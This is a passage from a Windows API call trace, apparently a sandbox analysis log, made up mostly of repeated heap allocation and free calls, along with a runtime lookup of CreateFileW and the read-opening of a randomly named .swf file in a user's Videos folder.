lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.321] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0101.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0101.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0101.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0101.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0101.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0101.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0101.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0101.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0101.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.375] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0101.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0101.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cabc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0101.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.376] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0101.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0101.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0101.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0101.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0101.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0101.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0101.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0101.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0101.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0101.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0101.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0101.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0101.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0101.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\GPtGPTImgDjIi0576udd.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\gptgptimgdjii0576udd.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0101.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0101.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0101.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0101.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0101.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0101.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0101.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0101.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.379] FreeLibrary (hLibModule=0x772d0000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0101.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0101.380] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0101.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0101.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0101.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0101.380] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0101.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0101.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0101.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0101.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0101.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0101.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0101.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0101.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.381] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0101.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0101.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, 